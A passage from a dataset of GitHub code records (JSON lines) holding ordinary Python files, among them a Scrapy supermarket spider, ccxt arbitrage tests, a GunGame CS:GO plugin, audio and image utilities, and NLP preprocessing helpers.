piece.bitmap_image.y,\n \"width\": piece.bitmap_image.width,\n \"height\": piece.bitmap_image.height,\n \"sprite\": {\n \"x\": piece.bitmap_image.sprite_offset.x,\n \"y\": piece.bitmap_image.sprite_offset.y\n }\n }\n for piece in place.pieces]\n\n image_file_name = \"{}/{}.label_sprites.png\".format(dir_name, place.id)\n place.sprite.save_to_filename(image_file_name)\n logging.info(\"saved image to {}\".format(image_file_name))\n\n json_file_name = \"{}/{}.labels.json\".format(dir_name, place.id)\n with open(json_file_name, 'w') as out:\n json.dump(collapsed, out, indent=True, sort_keys=True)\n logging.info(\n \"saved {} pieces to {}\".format(len(collapsed), json_file_name))\n\n def split(self, place_id):\n if place_id in self.place_ids:\n sprite = self.load_sprite_from_file(place_id)\n pieces = list()\n pieces_from_file = self.load_pieces_from_file(place_id)\n logging.info(\"loaded {} pieces from file\".format(len(pieces_from_file)))\n for entry in pieces_from_file:\n piece_id = self.make_global_id(place_id, entry['id'])\n\n layout_offset_lookup = \\\n LayoutOffsetLookupFn(self.layout_registry,\n place_id,\n piece_id)\n\n piece = Piece(id=piece_id,\n bitmap_image=BitmapImage(\n x=entry['x'],\n y=entry['y'],\n width=entry['width'],\n height=entry['height'],\n sprite_offset=self.read_sprite_offset(\n entry),\n layout_offset_lookup=layout_offset_lookup))\n pieces.append(piece)\n\n pieces_filtered = self.filter_out_background(pieces)\n logging.info(\n \"{} pieces left after background filtering\"\n .format(len(pieces_filtered)))\n\n return Place(id=place_id,\n sprite=sprite,\n pieces=pieces_filtered)\n else:\n None\n\n def make_global_id(self, place_id, index):\n return \"{}_{}\".format(place_id, index)\n\n @classmethod\n def index_from_global_id(cls, global_id):\n match = re.search(r'.+_(\\d+)$', global_id)\n return match.group(1)\n\n def load_pieces_from_file(self, place_id):\n with open(\"{}/{}.labels.json\".format(self.dir_name, place_id)) as file:\n return json.load(file)\n\n def load_sprite_from_file(self, place_id):\n filename = \"{}/{}.label_sprites.png\".format(self.dir_name, place_id)\n return Sprite.from_filename(filename)\n\n @staticmethod\n def read_sprite_offset(entry):\n if \"sprite\" in entry:\n return SpriteOffset(\n x=entry['sprite']['x'],\n y=entry['sprite']['y']\n )\n else:\n return SpriteOffset(\n x=entry['sprite_offset'],\n y=0\n )\n\n @classmethod\n def place_ids_in_dir(cls, dir_name):\n for file in glob.glob(\"{}/*.labels.json\".format(dir_name)):\n match = re.search(\"{}/(.+).labels.json\".format(dir_name), file)\n if match:\n yield match.group(1)\n\n def filter_out_background(self, pieces):\n def is_background(piece):\n bitmap_image = piece.bitmap_image\n sprite_offset = bitmap_image.sprite_offset\n return bitmap_image.x == 0 and sprite_offset.x == 0\n\n if self.has_background:\n return list(filter(lambda p: not is_background(p), pieces))\n else:\n return pieces\n","repo_name":"mikemoraned/biscuits","sub_path":"speculaas/pieces-finder/precomputed_lookup_splitter.py","file_name":"precomputed_lookup_splitter.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"7083648502","text":"from unittest import TestCase\nfrom peregrinearb.async_build_markets import build_collections, build_specific_collections, SymbolCollectionBuilder\nimport ccxt.async_support as ccxt\nimport asyncio\nfrom peregrinearb.multi_graph_builder import build_arbitrage_graph_for_exchanges\n\n\nclass TestCollectionBuilders(TestCase):\n\n def test_errors_raised(self):\n with self.assertRaises(ValueError):\n # note the misspelling of \"countries\" as \"contries\"\n build_specific_collections(contries=['US'])\n\n def test_whitelist_blacklist(self):\n us_exchanges = asyncio.get_event_loop().run_until_complete(build_specific_collections(countries=['US']))\n confirmed_us_exchanges = []\n for exchange_list in us_exchanges.values():\n for exchange_name in exchange_list:\n # so each exchange is only checked once.\n if exchange_name in confirmed_us_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertIn('US', exchange.countries)\n confirmed_us_exchanges.append(exchange_name)\n\n not_us_exchanges = asyncio.get_event_loop().run_until_complete(\n build_specific_collections(countries=['US'], blacklist=True)\n )\n confirmed_not_us_exchanges = []\n for exchange_list in not_us_exchanges.values():\n for exchange_name in exchange_list:\n # so each exchange is only checked once.\n if exchange_name in confirmed_not_us_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertNotIn('US', exchange.countries)\n confirmed_not_us_exchanges.append(exchange_name)\n\n def test_kwargs_with_dict_as_rule(self):\n specific_collections = asyncio.get_event_loop().run_until_complete(\n build_specific_collections(has={'fetchOrderBook': True, 'createOrder': True})\n )\n # exchanges which are confirmed to meet the given criteria (.hasFetchOrderBook and .hasCreateOrder)\n confirmed_exchanges = []\n for exchange_list in specific_collections.values():\n for exchange_name in exchange_list:\n if exchange_name in confirmed_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertTrue(exchange.hasFetchOrderBook and exchange.hasCreateOrder)\n confirmed_exchanges.append(exchange_name)\n\n def test_build_collections(self):\n collections = asyncio.get_event_loop().run_until_complete(build_collections(write=False))\n confirmed_exchanges = []\n for exchange_list in collections.values():\n for exchange_name in exchange_list:\n if exchange_name in confirmed_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertTrue(exchange.has['fetchOrderBook'])\n confirmed_exchanges.append(exchange_name)\n\n\nclass TestExchangeGraphBuilder(TestCase):\n\n def test_all_node_degrees_greater_than_one(self):\n exchanges = ['bittrex', 'bitstamp', 'poloniex']\n graph = asyncio.get_event_loop().run_until_complete(build_arbitrage_graph_for_exchanges(exchanges))\n for node in graph:\n self.assertGreater(graph.degree(node), 1)\n\n def test_market_names_of_edges_are_valid(self):\n exchange_names = ['bittrex', 'bitstamp', 'poloniex']\n graph = asyncio.get_event_loop().run_until_complete(build_arbitrage_graph_for_exchanges(exchange_names))\n\n # load the exchanges with their markets\n exchanges = {exchange_name: getattr(ccxt, exchange_name)() for exchange_name in exchange_names}\n futures = [asyncio.ensure_future(exchange.load_markets()) for exchange in exchanges.values()]\n asyncio.get_event_loop().run_until_complete(asyncio.gather(*futures))\n\n for edge in graph.edges(data=True):\n data = edge[2]\n exchange = exchanges[data['exchange_name']]\n self.assertIn(data['market_name'], exchange.symbols)\n\n\nclass TestExchange(ccxt.Exchange):\n\n def __init__(self, name='', markets=None):\n super().__init__()\n if markets is None:\n markets = {}\n self.markets = markets\n self.id = name\n\n @property\n def symbols(self):\n return self.markets.keys()\n\n @property\n def currencies(self):\n result = set()\n for market in self.markets:\n try:\n base, quote = market.split('/')\n except ValueError:\n continue\n result.add(base)\n result.add(quote)\n return result\n\n async def load_markets(self, reload=False):\n pass\n\n\nclass SymbolCollectionBuilderTestCase(TestCase):\n\n def test_add_exchange_to_symbol(self):\n exchange_a = TestExchange(name='a', )\n exchange_b = TestExchange(name='b', )\n\n builder = SymbolCollectionBuilder([exchange_a, exchange_b], )\n self.assertEqual(builder.collections, {})\n builder._add_exchange_to_symbol('A/B', 'a')\n self.assertEqual(builder.collections, {'A/B': ['a']})\n builder._add_exchange_to_symbol('A/B', 'a')\n self.assertEqual(builder.collections, {'A/B': ['a']})\n\n builder._add_exchange_to_symbol('A/B', 'b')\n self.assertEqual(builder.collections, {'A/B': ['a', 'b']})\n\n builder._add_exchange_to_symbol('B/C', 'b')\n self.assertEqual(builder.collections, {'A/B': ['a', 'b'], 'B/C': ['b']})\n\n asyncio.get_event_loop().run_until_complete(exchange_a.close())\n asyncio.get_event_loop().run_until_complete(exchange_b.close())\n\n def test_add_exchange_to_collections(self):\n exchange_a = TestExchange(name='a', markets={sym: {} for sym in ['A/B', 'A/C', 'B/C', 'E/C']})\n exchange_b = TestExchange(name='b', markets={sym: {} for sym in ['A/B', 'D/C', 'B/C', 'E/A', 'A/X']})\n\n builder = SymbolCollectionBuilder([exchange_a, exchange_b],\n symbols=['D/C'],\n exclusive_currencies=['B', 'X', 'C'],\n inclusive_currencies=['D'], )\n\n result = asyncio.get_event_loop().run_until_complete(builder.build_collections(write=False, ))\n print(result)\n self.assertEqual(result, {'B/C': ['a', 'b'], 'D/C': ['b']})\n","repo_name":"wardbradt/peregrine","sub_path":"peregrinearb/tests/test_build_markets.py","file_name":"test_build_markets.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":1139,"dataset":"github-code","pt":"6"} +{"seq_id":"30486193781","text":"import numpy as np\nimport cffi\nimport subprocess\nimport os\nimport glob\n\nroot = os.path.dirname(os.path.dirname(__file__))\n\nlibs = glob.glob(root + \"/fast_sweeping_capi.*.so\")\n\nif len(libs) == 0:\n raise(OSError(\"fast_sweeping_capi.*.so library not found\"))\n\nif len(libs) > 1:\n raise(OSError((\"More then one candidate of fast_sweeping_capi.*.so library found: {}\").format(libs)))\n\nffi = cffi.FFI()\nlib = ffi.dlopen(libs[0])\n\nffi.cdef(\"\"\"\nvoid signed_distance_2d(double*, double*, size_t, size_t, double);\nvoid signed_distance_3d(double*, double*, size_t, size_t, size_t, double);\ndouble hausdorff_dist_2d(double*, double*, size_t, size_t, double);\ndouble l2_hausdorff_dist_2d(double*, double*, size_t, size_t, double);\ndouble hausdorff_dist_3d(double*, double*, size_t, size_t, size_t, double);\ndouble l2_hausdorff_dist_3d(double*, double*, size_t, size_t, size_t, double);\n\n\"\"\")\n\ndef verify_ffi_array(u, dtype):\n if u.dtype != dtype:\n raise TypeError('Array must be of type {}.'.format(dtype))\n if not u.flags.c_contiguous:\n raise TypeError('Array must be C contiguos.')\n if not u.flags.aligned:\n raise TypeError('Array must be properly aligned.')\n\ndef signed_distance(u, h, out = None):\n \"\"\"\n Computes the signed distance to the zero level set of the function `u`\n given on a regular grid with spacing `h`.\n\n You can use `out` to specify an array where to store the result.\n \"\"\"\n verify_ffi_array(u, np.dtype('float64'))\n\n if out is None:\n d = np.zeros_like(u, order='c')\n else:\n d = out\n\n verify_ffi_array(d, np.dtype('float64'))\n\n pd = ffi.cast(\"double *\", d.ctypes.data)\n pu = ffi.cast(\"double *\", u.ctypes.data)\n\n if len(u.shape) == 2:\n i, j = u.shape\n\n lib.signed_distance_2d(pd, pu, i, j, h)\n elif len(u.shape) == 3:\n i, j, k = u.shape\n lib.signed_distance_3d(pd, pu, i, j, k, h)\n else:\n raise TypeError(\"Array must be 2 or 3 dimensional.\")\n\n return d\n\ndef hausdorff_dist(u, v, h, l2=True):\n \"\"\" Returns the Hausdorff distance between two zero level sets.\n\n Returns +∞ if at least one of the level sets is empty.\"\"\"\n verify_ffi_array(u, np.dtype('float64'))\n verify_ffi_array(v, np.dtype('float64'))\n\n if u.shape != v.shape:\n raise TypeError(\"Arrays must have the same shape.\")\n\n pu = ffi.cast(\"double *\", u.ctypes.data)\n pv = ffi.cast(\"double *\", v.ctypes.data)\n\n if len(u.shape) == 2:\n i, j = u.shape\n\n if l2:\n return lib.l2_hausdorff_dist_2d(pu, pv, i, j, h)\n else:\n return lib.hausdorff_dist_2d(pu, pv, i, j, h)\n elif len(u.shape) == 3:\n i, j, k = u.shape\n\n if l2:\n return lib.l2_hausdorff_dist_3d(pu, pv, i, j, k, h)\n else:\n return lib.hausdorff_dist_3d(pu, pv, i, j, k, h)\n else:\n raise TypeError(\"Array must be 2 or 3 dimensional.\")\n","repo_name":"rekka/fast_sweeping","sub_path":"python/fast_sweeping/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"14999245083","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport urlparse\nfrom scrapy.loader import ItemLoader\nfrom scrapy_pv.items import ScrapyPvItem\nfrom scrapy.loader.processors import MapCompose\nimport socket\n\nclass BotWgSpider(scrapy.Spider):\n name = 'bot_wg'\n allowed_domains = ['wong.com.pe']\n #start_urls = ['https://www.wong.com.pe/FO/supermercados/index.go?search=2&caip=1']\n start_urls = ['https://www.wong.com.pe/FO/supermercados/index.go?search=2&caip=1']\n #https://www.wong.com.pe/FO/supermercados/productos.go?idCategoria=3962&idSubCategoria=4207\n #https://www.wong.com.pe/FO/fichas/index.go?idprod=143229&cat=4089\n\n def start_requests(self):\n # https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#cookies-debug\n # Multiple cookie sessions per spider\n for i,url in enumerate(self.start_urls):\n yield scrapy.Request(url,\n self.parse,\n method='POST',\n meta={'cookiejar': i}\n )\n\n def parse(self, response):\n # Get item URLs and yield Requests\n meta = response.xpath('//li[@class=\"subcategoria\"]/a/@id')\n for m in meta:\n ids=m.extract().split(\"_\") # dividimos la categoria de la subcategoria\n url=\"https://www.wong.com.pe/FO/supermercados/productos.go?idCategoria=\"+ids[0]+\"&idSubCategoria=\"+ids[1]\n yield scrapy.Request(urlparse.urljoin(response.url, url),\n self.parse_lista,\n meta={'cookiejar': response.meta['cookiejar']}\n )\n\n def parse_lista(self, response):\n s_text = \" \".join(response.xpath('//div[@id=\"breadcrumbs\"]/text()').extract()[1].split())\n a_categ = s_text.split(\"/\")\n meta = response.xpath('//tbody/tr/@id')\n for m in meta:\n ids = m.extract().split(\"_\") # dividimos y obtenermos el cod del producto\n url=\"https://www.wong.com.pe/FO/fichas/index.go?idprod=\"+ids[1]\n yield scrapy.Request(urlparse.urljoin(response.url, url),\n self.parse_item,\n meta={'cookiejar': response.meta['cookiejar'],\n 'v_categoria':a_categ[0],\n 'v_subcategoria': a_categ[1],\n 'v_id': ids[1]\n }\n )\n\n def parse_item(self,response):\n default = ScrapyPvItem()\n default['principal'] = ['wong']\n default['categoria'] = [response.meta['v_categoria']]\n default['subcategoria'] = [response.meta['v_subcategoria']]\n default['tipo'] = ['']\n default['titulo'] = ['']\n default['brand'] = ['']\n default['codigo_producto'] = [response.meta['v_id']]\n default['imagen'] = ['']\n default['estrellas'] = ['']\n default['especificacion'] = ['']\n default['mejor_precio'] = ['']\n default['precio_normal'] = ['']\n default['unidad'] = ['']\n default['promocion'] = ['']\n default['url'] = ['']\n default['project'] = ['']\n default['spider'] = ['']\n default['server'] = ['']\n\n l = ItemLoader(item=default, response=response)\n\n l.add_xpath('tipo', '//*[@id=\"f_productos_0\"]/span[1]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('titulo', '//*[@id=\"f_productos_0\"]/span[3]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('brand', '//*[@id=\"f_productos_0\"]/span[2]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('imagen', '//*[@id=\"foto\"]/img/@src',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('mejor_precio', '//*[@id=\"f_productos_0\"]/span[4]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('precio_normal', '//*[@id=\"f_productos_0\"]/span[3]/span/text()',\n MapCompose(unicode.strip, unicode.title))\n\n l.add_value('url', response.url)\n l.add_value('project', self.settings.get('BOT_NAME'))\n l.add_value('spider', self.name)\n l.add_value('server', socket.gethostname())\n\n return l.load_item()\n","repo_name":"joenvihe/ejemplos_scrapy","sub_path":"scrapy_pv/scrapy_pv/spiders/bot_wg.py","file_name":"bot_wg.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22935536050","text":"\n\nimport subprocess\nimport types\nimport wave\n\n\ndef play(data, rate=16000, channels=1, width=2):\n \"\"\"\n play raw audio (string or generator)\n Args:\n data: raw audio data, str or iterator\n rate: sample rate, only for raw audio\n channels: channel number, only for raw data\n width: raw audio data width, 16 bit is 2, only for raw data\n \"\"\"\n format_list = (None, 'S8', 'S16_LE', 'S24_LE', 'S32_LE')\n command = 'aplay -c {} -r {} -f {} -'.format(channels, rate, format_list[width])\n \n p = subprocess.Popen(command, stdin=subprocess.PIPE, shell=True)\n p.stdin.write(b'\\0' * 2 * 16000)\n if isinstance(data, types.GeneratorType):\n for d in data:\n print(len(d))\n p.stdin.write(d)\n else:\n p.stdin.write(data)\n\n p.stdin.write(b'\\0' * 2 * 16000)\n p.stdin.close()\n p.wait()\n\n\ndef play_wav(wav):\n f = wave.open(wav, 'rb')\n rate = f.getframerate()\n channels = f.getnchannels()\n width = f.getsampwidth()\n\n def gen(w):\n d = w.readframes(1024)\n while d:\n yield d\n d = w.readframes(1024)\n w.close()\n\n data = gen(f)\n\n play(data, rate, channels, width)\n\n\n\ndef main():\n import sys\n\n if len(sys.argv) < 2:\n print('Usage: python {} music.wav'.format(sys.argv[0]))\n sys.exit(1)\n\n play_wav(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"voice-engine/wenwen","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"23480669822","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='Qc_index'),\n path('proj/', views.project, name='Pj_list'),\n path('proj//', views.proj_detail, name='Pj_detail'),\n path('slfchkstanin//', views.slfchkstandin_detail, name='SlfChkStandIn_detail'),\n path('category//', views.cate_detail, name='Cate_detail'),\n path('category/', views.category, name='Cate_list'),\n path('category/workslist/', views.works, name='Work_list'),\n path('catecory/workslist/arrange/', views.arng, name='Arng_list'),\n path('catecory/workslist/arrange/add/', views.arng_add, name='Arng_add'),\n]","repo_name":"edward79519/qcsystem","sub_path":"qcmanager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40785138611","text":"\"\"\"\nEn este módulo algunas funciones para preprocesar texto antes de pasarselo a\ncada uno de nuestros modelos.\n\nText Pre-processing\n-------------------\n\"\"\"\n\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nfrom nltk.stem import WordNetLemmatizer \n\n\ndef rem_stopwords_tokenize(data): \n \"\"\"\n Esta función elimina stopwords de una frase concreta.\n\n Args:\n data (:obj: `list`): Frase, lista de palabras.\n Returns:\n list: Frase sin stopwords.\n \"\"\"\n stop_words = set(stopwords.words('english')) \n x=[]\n for i in data:\n word_tokens = word_tokenize(i) \n x.append([w for w in word_tokens if not w in stop_words])\n \n return x\n\n\ndef lemmatize_all(data):\n \"\"\"\n Esta función elimina el 'lema' de todas las palabras de una frase.\n\n Args:\n data (:obj: `list`): Frase, lista de palabras.\n Returns:\n list: Frase con palabras sin lema.\n \"\"\"\n lemmatizer = WordNetLemmatizer() \n a=[]\n for i in data:\n a.append([lemmatizer.lemmatize(j) for j in i])\n return a\n\n\ndef convert_to_string(data):\n \"\"\"\n Esta función convierte una frase en forma de lista de palabras a una\n frase en forma de cadena de texto.\n\n Args:\n data (:obj: `list`): Frase, lista de palabras.\n Returns:\n str: Frase, cadena de texto\n \"\"\"\n p=[]\n for i in data:\n # Importante eliminar comas \n l = list(filter(lambda a: a != ',', i))\n listToStr = ' '.join(map(str, l))\n p.append(listToStr)\n return p\n","repo_name":"ericmrls/Backend-TFG","sub_path":"src/classic_model/text_preprocessing.py","file_name":"text_preprocessing.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19011945051","text":"from typing import List\nimport cv2\nimport os\nimport numpy as np\nimport imgaug.augmenters as iaa\nfrom random import randrange\n\ndef loadFrames(folder):\n images = []\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename))\n if img is not None:\n images.append(img)\n return images\n\nseq = iaa.Sequential([\n \n iaa.GaussianBlur(sigma=(0, 3.0))\n \n])\n\ndef writeImages(imLists):\n\n for listNum, list in enumerate(imLists):\n for imNum, image in enumerate(list):\n cv2.imwrite(image, './data/augmented/scene{}_{}.PNG'.format(\"%05d\",listNum,imNum))\n \n return\n\ndef main():\n \n images = loadFrames('/home/topnotces/frames')\n ListOfImages = [ [] for _ in range(len(images)) ]\n\n for _ in range(10):\n imAug = seq(images=images) \n for j, im in enumerate(imAug):\n print(j)\n ListOfImages[j].append(im)\n\n writeImages(ListOfImages)\n\n \n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"topnotches/Bachelors_Project","sub_path":"YoloV3/cock.py","file_name":"cock.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39269783595","text":"\n\nimport logging\nimport re\nimport subprocess\nimport time\nfrom contextlib import contextmanager\n\nfrom flask_sqlalchemy import get_debug_queries\nfrom sqlalchemy.orm import class_mapper, defer\n\n\n_MAX_LENGTH = 300\n\n\ndef safe_repr(obj, short=True):\n try:\n result = repr(obj)\n except Exception:\n result = object.__repr__(obj)\n if not short or len(result) < _MAX_LENGTH:\n return result\n return result[:_MAX_LENGTH] + ' [truncated]...'\n\n\n@contextmanager\ndef timing(label):\n start = time.time()\n yield\n print(('Time for %s: %.3f' % (label, time.time() - start)))\n\n\ndef defer_except(entity, cols, path=()):\n m = class_mapper(entity)\n defer_columns = set(p.key for p\n in m.iterate_properties\n if hasattr(p, 'columns')).difference(cols)\n return [defer(*(list(path) + [k])) for k in defer_columns]\n\n\n@contextmanager\ndef print_queries():\n start_len = len(get_debug_queries())\n try:\n yield\n finally:\n for q in get_debug_queries()[start_len:]:\n try:\n print((\">>> %.3f\" % q.duration, q.statement % tuple(repr(p) for p in q.parameters)))\n except:\n print((q.statement, q.parameters))\n print()\n print((len(get_debug_queries()) - start_len, \"queries\"))\n\n\ndef printquery(statement, bind=None):\n \"\"\"\n print a query, with values filled in\n for debugging purposes *only*\n for security, you should always separate queries from their values\n please also note that this function is quite slow\n \"\"\"\n import sqlalchemy.orm\n if isinstance(statement, sqlalchemy.orm.Query):\n if bind is None:\n bind = statement.session.get_bind(statement._mapper_zero_or_none())\n statement = statement.statement\n elif bind is None:\n bind = statement.bind\n\n dialect = bind.dialect\n compiler = statement._compiler(dialect)\n\n class LiteralCompiler(compiler.__class__):\n def visit_bindparam(\n self, bindparam, within_columns_clause=False,\n literal_binds=False, **kwargs):\n return super(LiteralCompiler, self).render_literal_bindparam(\n bindparam,\n within_columns_clause=within_columns_clause,\n literal_binds=literal_binds, **kwargs)\n\n compiler = LiteralCompiler(dialect, statement)\n print((compiler.process(statement)))\n\n\ndef make_fqdn(target, zone_name):\n if target.endswith('.'):\n return target\n elif target == '@':\n return zone_name + '.'\n else:\n if zone_name != '':\n return target + '.' + zone_name + '.'\n return target + '.'\n\n\ndef email2fqdn(string):\n name, host = string.split('@')\n return '%s.%s.' % (name.replace('.', '\\\\.'), host)\n\n\ndef fqdn2email(string):\n name, host = re.split(r'(? Illust:\n site_url = match.group(1)\n post_id = match.group(2)\n db = Database().driver()\n collection = db.collection(COLLECTIONS[site_url])\n api = Moebooru().site(site_url)\n\n illust = await api.view(post_id)\n illust.metadata[\"collected_at\"] = time()\n await collection.insert(int(post_id), illust.metadata)\n return illust\n","repo_name":"y-young/nazurin","sub_path":"nazurin/sites/moebooru/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"6"} +{"seq_id":"21842658884","text":"# ../gungame/games/csgo.py\n\n\"\"\"CS:GO changes.\"\"\"\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Python\nfrom warnings import warn\n\n# Source.Python\nfrom core import GAME_NAME\nfrom events import Event\nfrom weapons.manager import weapon_manager\n\n# GunGame\nfrom gungame.core.config.misc import allow_kills_after_round, level_on_protect\nfrom gungame.core.messages.manager import message_manager\nfrom gungame.core.players.dictionary import player_dictionary\nfrom gungame.core.players.instance import GunGamePlayer\nfrom gungame.core.status import (\n GunGameMatchStatus, GunGameRoundStatus, GunGameStatus,\n)\nfrom gungame.core.weapons.groups import incendiary_weapons, individual_weapons\n\n\n# =============================================================================\n# >> OVERRIDES\n# =============================================================================\nindividual_weapons.add('taser')\n\n\nclass _NoMessage:\n \"\"\"Class used to hook non-supported message types.\"\"\"\n\n def __init__(self, message_type):\n \"\"\"Store the message type.\"\"\"\n self.message_type = message_type\n\n def message_hook(self, *args, **kwargs):\n \"\"\"Override for messages that do not work.\"\"\"\n warn(\n f'Message type \"{self.message_type}\" not supported for '\n f'game \"{GAME_NAME}\".'\n )\n\n\n# CS:GO doesn't support any Dialog menus/messages\nmessage_manager.top_message = _NoMessage('DialogMsg').message_hook\n# CS:GO Center and KeyHint message are in same location as HintText\nmessage_manager.center_message = message_manager.hint_message\nmessage_manager.keyhint_message = message_manager.hint_message\n\n\n@Event('player_death')\ndef _player_death(game_event):\n \"\"\"Award the killer with a multi-kill increase or level increase.\"\"\"\n # Is GunGame active?\n if GunGameStatus.MATCH is not GunGameMatchStatus.ACTIVE:\n return\n\n # Is the round active or should kills after the round count?\n if (\n GunGameStatus.ROUND is GunGameRoundStatus.INACTIVE and\n not allow_kills_after_round.get_int()\n ):\n return\n\n # Get the victim\n userid = game_event['userid']\n\n # Get the attacker\n attacker = game_event['attacker']\n\n # Was this a suicide?\n if attacker in (userid, 0):\n return\n\n # Get the victim's instance\n victim = player_dictionary[userid]\n\n # Get the attacker's instance\n killer = player_dictionary[attacker]\n\n # Was this a team-kill?\n if victim.team_index == killer.team_index:\n return\n\n if killer.in_spawn_protection and not level_on_protect.get_int():\n return\n\n # Did the killer kill using their level's weapon?\n try:\n weapon = weapon_manager[game_event['weapon']].basename\n except KeyError:\n return\n\n if weapon != 'molotov':\n return\n\n if killer.level_weapon in incendiary_weapons:\n weapon = killer.level_weapon\n\n if weapon_manager[weapon].basename != killer.level_weapon:\n return\n\n # Increase the killer's multi_kill\n killer.multi_kill += 1\n\n # Does the player need leveled up?\n if killer.multi_kill < killer.level_multi_kill:\n\n # If not, no need to go further\n return\n\n # Level the player up\n killer.increase_level(\n levels=1,\n reason='kill',\n victim=userid,\n )\n\n\ndef _give_level_weapon(player):\n \"\"\"Hooks give_level_weapon to ensure that the proper weapon is given.\"\"\"\n weapon = _old_give_level_weapon(player)\n if weapon.classname == weapon.weapon_name:\n return weapon\n weapon.remove()\n player.team_index = 5 - player.team_index\n weapon = _old_give_level_weapon(player)\n player.team_index = 5 - player.team_index\n return weapon\n\n\n_old_give_level_weapon = GunGamePlayer.give_level_weapon\nGunGamePlayer.give_level_weapon = _give_level_weapon\n","repo_name":"GunGame-Dev-Team/GunGame-SP","sub_path":"addons/source-python/plugins/gungame/games/csgo.py","file_name":"csgo.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"9312238182","text":"class Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \"\"\"\n Complexity: O(n)\n Space: O(n)\n let dp[i] be the maximum subarray ending at the ith index.\n\n If we use Divide and Conquer the complexity becomes(nlogn),\n logn for binary search, n for the maximum subarray cross the left and right\n\n \"\"\"\n dp = [0]*len(nums)\n dp[0] = nums[0]\n max_value = dp[0]\n for i in range(1, len(nums)):\n dp[i] = dp[i-1] + nums[i] if dp[i-1] > 0 else nums[i]\n max_value = max(max_value, dp[i])\n \n return max_value\n \n","repo_name":"acnokego/LeetCode","sub_path":"053_maximum_subarray/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33003818644","text":"#!/usr/bin/env python3\n\nfrom PIL import Image\nimport numpy as np\nimport os\nimport random\nimport copy\n\nnew_size = (256, 144)\n\ndef prepareImages(root_dir = None):\n\n training_images = []\n testing_images = []\n training_labels = []\n testing_labels = []\n if root_dir is None:\n root_dir = os.path.realpath(\".\")\n for root, dirs, files_t in os.walk(root_dir):\n for d in dirs:\n if d == \"data\":\n t_dir = os.path.join(root_dir, d)\n for subroot, subdirs, files_t in os.walk(t_dir):\n for d_2 in subdirs:\n l_dir = os.path.join(t_dir, d_2)\n for subsubroot, dirs_2, files in os.walk(l_dir):\n for f in files:\n training_string = os.path.join(l_dir, f)\n with Image.open(training_string) as h:\n h_2 = h.resize(new_size)\n training_images.append(np.array(h_2))\n if d_2 == \"Snake\":\n training_labels.append(0)\n else:\n training_labels.append(1)\n\n temp_indices = [x for x in range(len(training_images))]\n removal_indices = []\n while len(removal_indices) < ((5 * len(training_images)) / 6):\n removal_indices.append(temp_indices.pop(random.randint(0, len(temp_indices) - 1)))\n\n removal_indices.sort(reverse=True)\n for i in removal_indices:\n testing_images.append(copy.deepcopy(training_images[i]))\n testing_labels.append(copy.copy(training_labels[i]))\n del training_images[i]\n del training_labels[i]\n \n training_images = np.asarray(training_images)\n training_labels = np.asarray(training_labels)\n testing_images = np.asarray(testing_images)\n testing_labels = np.asarray(testing_labels)\n\n return (training_images, training_labels), (testing_images, testing_labels)\n\ndef testImages(root_dir):\n pictures = []\n names = []\n for root, dirs, files in os.walk(root_dir):\n temp = os.path.join(root_dir, files[f])\n with Image.open(temp) as h:\n h_2 = h.resize(new_size)\n h_2 = np.asarray(h_2)\n h_2 = h_2 / 255.0\n pictures.append(h_2)\n names.append(temp.split(\"/\")[-1])\n print(names[-1])\n\n print(\"Done with Prep Phase.\")\n \n return np.asarray(pictures), names\n\n","repo_name":"ClarkHensley/SnakeClassifier","sub_path":"Prep_Image.py","file_name":"Prep_Image.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73561662909","text":"# -*- coding: utf-8 -*-\n\"\"\"CRM entity classes\n\n.. module:: testenv.entities.crm_entities\n :platform: Unix\n :synopsis: 